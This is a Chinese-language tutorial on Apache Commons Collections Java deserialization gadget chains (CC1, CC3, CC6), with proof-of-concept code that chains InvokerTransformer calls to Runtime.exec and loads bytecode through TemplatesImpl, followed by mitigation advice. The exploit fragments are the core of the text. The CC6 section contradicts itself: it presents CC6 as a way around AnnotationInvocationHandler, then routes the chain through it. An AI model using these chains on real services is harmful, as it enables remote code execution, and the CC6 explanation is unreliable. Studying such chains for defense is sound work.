Apache Commons Collections 反序列化漏洞利用链（CC链）详解教学文档<\/h2>

文档概述<\/h3>

本教学文档旨在系统性地讲解Apache Commons Collections（以下简称CC）库中存在的反序列化漏洞利用链。通过本文档，您将深入了解CC链的核心原理、关键组件、不同利用链（如CC1、CC3、CC6等）的构造细节，以及如何搭建实验环境进行复现。本文档假设读者已具备Java基础、反射机制的基本知识以及简单的序列化\/反序列化概念。<\/p>

实验环境要求：<\/strong><\/p>

JDK:<\/strong> 1.8.0_65（关键！JDK 8u71及以上版本已修复相关漏洞）<\/li>
依赖库:<\/strong> Commons Collections 3.2.1<\/li>
IDE:<\/strong> 支持Java调试的IDE（如IntelliJ IDEA或Eclipse）<\/li> <\/ul>
第一部分：核心概念与基础<\/h3>
1.1 漏洞根源：Transformer接口<\/h4>
CC链的源头是org.apache.commons.collections.Transformer<\/code>接口。该接口的核心方法是transform<\/code>，其设计初衷是将一个输入对象转换为另一个输出对象。<\/p>
public<\/span> interface<\/span> Transformer<\/span> {<\/span> <\/span><\/span> Object transform<\/span>(<\/span>Object input);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>漏洞成因：<\/strong> 当Transformer<\/code>接口的实现类（如InvokerTransformer<\/code>）的transform<\/code>方法被恶意利用，执行任意Java方法（如Runtime.exec()<\/code>）时，反序列化过程就变成了一个危险的代码执行通道。<\/p> 1.2 关键危险类：InvokerTransformer<\/h4> InvokerTransformer<\/code>是CC链中最核心的类，它利用Java反射机制在transform<\/code>方法中调用任意方法。<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span> \/\/ 可控 <\/span><\/span><\/span><\/span> return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span> \/\/ 可控 <\/span><\/span><\/span><\/span> }<\/span> catch<\/span> (...)<\/span> {<\/span> <\/span><\/span> ...<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用方式：<\/strong> 通过构造InvokerTransformer<\/code>实例，并控制其参数（方法名iMethodName<\/code>，参数类型iParamTypes<\/code>，参数值iArgs<\/code>），可以实现命令执行。<\/p> Runtime r =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span>InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>});<\/span> <\/span><\/span>invokerTransformer.<\/span>transform<\/span>(<\/span>r);<\/span> \/\/ 此时会弹出计算器 <\/span><\/span><\/span><\/code><\/pre>1.3 链式执行器：ChainedTransformer<\/h4> 由于反序列化时我们只能控制一个入口点，但命令执行需要多个反射调用步骤（getMethod<\/code> -> invoke<\/code> -> exec<\/code>）。ChainedTransformer<\/code>可以将多个Transformer<\/code>实例串联起来，按顺序执行。<\/p> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span>};<\/span> <\/span><\/span>Transformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span>chain.<\/span>transform<\/span>(<\/span>"anything"<\/span>);<\/span> \/\/ 执行链式调用，弹出计算器 <\/span><\/span><\/span><\/code><\/pre> ConstantTransformer<\/code>：无论输入是什么，transform<\/code>方法总是返回构造时传入的对象。这里用于提供Runtime.class<\/code>作为反射调用的起点。<\/li> <\/ul> 1.4 触发入口：Map装饰器<\/h4> 我们需要找到一个在反序列化（readObject<\/code>）过程中，能够自动调用我们精心构造的Transformer<\/code>链的类。CC库提供了两个关键的Map<\/code>装饰器：<\/p> TransformedMap<\/strong>: 对其中的key<\/code>或value<\/code>进行转换。<\/li> LazyMap<\/strong>: 当get<\/code>方法查询一个不存在的key<\/code>时，会使用Transformer<\/code>工厂自动生成一个value<\/code>。<\/li> <\/ol> 这两个类的checkSetValue<\/code>（TransformedMap）和get<\/code>（LazyMap）方法最终都会调用transform<\/code>方法。<\/p> 1.5 最终触发器：AnnotationInvocationHandler<\/h4> sun.reflect.annotation.AnnotationInvocationHandler<\/code>类是完成整个利用链的“临门一脚”。它的readObject<\/code>方法在反序列化时，会遍历其memberValues<\/code>字段（一个Map<\/code>对象）。这个遍历过程会调用Map.Entry<\/code>的setValue<\/code>方法，而setValue<\/code>会触发TransformedMap<\/code>的checkSetValue<\/code>，或者通过动态代理触发LazyMap<\/code>的get<\/code>方法。<\/p> 第二部分：主要利用链分析<\/h3> 2.1 CC1链（TransformedMap版）<\/h4> 这是最经典、最易于理解的CC链。<\/p> 利用链：<\/strong><\/p> AnnotationInvocationHandler.readObject() -> memberValues.entrySet().iterator().next().setValue(...) -> TransformedMap.MapEntry.setValue() -> TransformedMap.checkSetValue() -> ChainedTransformer.transform() -> ConstantTransformer.transform() \/\/ 提供Runtime.class -> InvokerTransformer.transform() \/\/ 调用getMethod("getRuntime") -> InvokerTransformer.transform() \/\/ 调用invoke(null) -> InvokerTransformer.transform() \/\/ 调用exec("calc") <\/code><\/pre> 构造POC的关键步骤：<\/strong><\/p> 构造Transformer链：<\/strong> 使用ChainedTransformer<\/code>串联ConstantTransformer<\/code>和多个InvokerTransformer<\/code>，形成命令执行链。<\/li> 包装恶意Map：<\/strong> 创建一个普通的HashMap<\/code>，并使用TransformedMap.decorate<\/code>方法将其包装，将valueTransformer<\/code>参数设置为我们的恶意ChainedTransformer<\/code>。 Map<<\/span>String,<\/span> String><\/span> normalMap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>normalMap.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "xxx"<\/span>);<\/span> \/\/ Key必须为"value"，原因见下文 <\/span><\/span><\/span><\/span>Map transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>normalMap,<\/span> null<\/span>,<\/span> chain);<\/span> <\/span><\/span><\/code><\/pre><\/li> 实例化AnnotationInvocationHandler：<\/strong> 通过反射创建AnnotationInvocationHandler<\/code>实例，并将其memberValues<\/code>字段设置为我们的恶意transformedMap<\/code>。注意，构造函数的第一个参数需要是一个包含名为value<\/code>的成员的注解（如java.lang.annotation.Target<\/code>），这样才能在readObject<\/code>时顺利进入setValue<\/code>的逻辑。 Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span>Constructor constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Object instance =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedMap);<\/span> <\/span><\/span><\/code><\/pre><\/li> 序列化与触发：<\/strong> 将该instance<\/code>对象序列化后，发送给目标。目标反序列化此数据时，漏洞即被触发。<\/li> <\/ol> 2.2 CC1链（LazyMap版）<\/h4> YSOSERIAL工具中使用的是此版本，利用了动态代理，更为巧妙。<\/p> 利用链：<\/strong><\/p> AnnotationInvocationHandler.readObject() -> memberValues.get(...) \/\/ memberValues是一个代理对象 -> AnnotationInvocationHandler.invoke() \/\/ 代理逻辑 -> LazyMap.get() -> ChainedTransformer.transform() -> ...（后续与TransformedMap版相同） <\/code><\/pre> 构造POC的关键步骤：<\/strong><\/p> 构造Transformer链：<\/strong> 与TransformedMap版相同。<\/li> 创建LazyMap：<\/strong> 使用LazyMap.decorate<\/code>方法创建一个恶意的LazyMap<\/code>。 Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>new<\/span> HashMap(),<\/span> chain);<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建代理Map：<\/strong> 创建一个AnnotationInvocationHandler<\/code>实例作为调用处理器，然后使用Proxy<\/code>生成一个代理Map<\/code>对象。当这个代理对象的任何方法被调用时，都会先进入AnnotationInvocationHandler.invoke<\/code>方法。 InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Retention.<\/span>class<\/span>,<\/span> lazyMap);<\/span> <\/span><\/span>Map proxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>Map.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> handler);<\/span> <\/span><\/span><\/code><\/pre><\/li> 包装最终Handler：<\/strong> 再创建一个新的AnnotationInvocationHandler<\/code>实例，其memberValues<\/code>字段设置为上一步的proxyMap<\/code>。 Object finalHandler =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Retention.<\/span>class<\/span>,<\/span> proxyMap);<\/span> <\/span><\/span><\/code><\/pre><\/li> 序列化与触发：<\/strong> 序列化finalHandler<\/code>对象。反序列化时，readObject<\/code>方法会尝试读取memberValues<\/code>（即proxyMap<\/code>），从而触发动态代理机制，执行整个利用链。<\/li> <\/ol> 2.3 CC3链（TemplatesImpl加载字节码）<\/h4> CC1链依赖于Runtime<\/code>执行命令，在某些受限环境（如无Runtime<\/code>或命令执行被拦截）下可能失效。CC3链的核心是直接加载恶意字节码，实现更底层的代码执行。<\/p> 核心类：com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/code><\/strong><\/p> 这个类有一个_bytecodes<\/code>字段，可以用于定义类。如果能够反序列化一个精心构造的TemplatesImpl<\/code>对象，并在其getOutputProperties()<\/code>方法（最终会调用defineClass()<\/code>）被调用时，即可执行_bytecodes<\/code>中的字节码。<\/p> 利用链（结合CC1）：<\/strong><\/p> AnnotationInvocationHandler.readObject() -> ... (与CC1链相同，触发Transformer链) -> InvokerTransformer.transform() \/\/ 调用TemplatesImpl.newTransformer()或getOutputProperties() -> TemplatesImpl.defineTransletClasses() \/\/ 加载恶意字节码 -> ... 实例化恶意类，静态代码块中的代码被执行 <\/code><\/pre> 关键点：<\/strong><\/p> 字节码生成：<\/strong> 需要预先将恶意Java代码编译成Class文件，并读取其字节码，设置到TemplatesImpl<\/code>的_bytecodes<\/code>字段中。<\/li> Transformer替换：<\/strong> 将CC1链中最终执行命令的InvokerTransformer<\/code>，替换为调用TemplatesImpl<\/code>方法的InvokerTransformer<\/code>。 \/\/ 替换掉执行exec的Transformer <\/span><\/span><\/span><\/span>new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span>\/\/ 或者 <\/span><\/span><\/span><\/span>new<\/span> InvokerTransformer(<\/span>"getOutputProperties"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2.4 CC6链（通用性增强）<\/h4> CC1链依赖于AnnotationInvocationHandler<\/code>，而高版本JDK中此类包名改变且内部逻辑更新，导致CC1失效。CC6链寻找了其他在readObject<\/code>中能触发LazyMap.get()<\/code>的路径，提高了通用性。<\/p> 核心类：java.util.HashMap<\/code><\/strong><\/p> HashMap<\/code>的readObject<\/code>方法在反序列化时会调用hash()<\/code>方法来计算每个键的哈希值。如果键是一个包含LazyMap<\/code>的动态代理对象，那么计算hashCode()<\/code>时就会触发代理逻辑。<\/p> 利用链：<\/strong><\/p> HashMap.readObject() -> hash(key) \/\/ key是一个代理对象 -> AnnotationInvocationHandler.invoke() -> LazyMap.get() \/\/ 后续与LazyMap版CC1相同) <\/code><\/pre> 构造思路：<\/strong><\/p> 先构造好LazyMap<\/code>和与之关联的ChainedTransformer<\/code>链。<\/li> 创建一个AnnotationInvocationHandler<\/code>代理对象，代理的是LazyMap<\/code>。<\/li> 实例化一个HashMap<\/code>，并放入一个键值对，其中key<\/code>就是上一步的代理对象。在放入之前，需要先通过一次get<\/code>操作触发Transformer<\/code>链，将LazyMap<\/code>中的转换缓存起来，避免在序列化前就执行命令。<\/li> 通过反射将ChainedTransformer<\/code>中的iTransformers<\/code>替换为真正的恶意链。<\/li> 序列化这个HashMap<\/code>。<\/li> <\/ol> 第三部分：实验与防护<\/h3> 3.1 实验注意事项<\/h4> JDK版本：<\/strong> 必须使用JDK 8u65或以下版本进行实验。<\/li> Sun包源码：<\/strong> 为了便于调试AnnotationInvocationHandler<\/code>，需要手动导入sun<\/code>包的源码。<\/li> POC构造顺序：<\/strong> 某些链（如CC6）需要仔细控制触发时机，避免在序列化前就执行了命令。<\/li> <\/ol> 3.2 防护措施<\/h4> 升级组件：<\/strong> 将Apache Commons Collections库升级至安全版本（如4.0及以上）。<\/li> JVM层面：<\/strong> 使用反序列化过滤器（JEP 290），限制反序列化的类。<\/li> 代码层面：<\/strong> 对反序列化操作进行白名单控制，避免直接反序列化不可信的流数据。<\/li> 安全编码：<\/strong> 避免在项目中使用不安全的ObjectInputStream.readObject()<\/code>。<\/li> <\/ol> 总结<\/h3> CC链是Java反序列化漏洞研究的里程碑。它深刻地揭示了软件供应链中基础组件的安全性如何被放大，以及“小功能”设计不当如何演变成“大漏洞”。理解CC链不仅有助于漏洞挖掘和代码审计，更是深入学习Java安全机制（反射、动态代理、类加载、序列化）的绝佳途径。在研究过程中，务必在合法、授权的环境中进行，避免对他人系统造成危害。<\/p> 免责声明：<\/strong> 本文档仅用于安全技术研究和教学目的。请勿将文中所述技术用于任何非法活动。使用者需自行承担因滥用该技术而产生的一切后果。<\/p>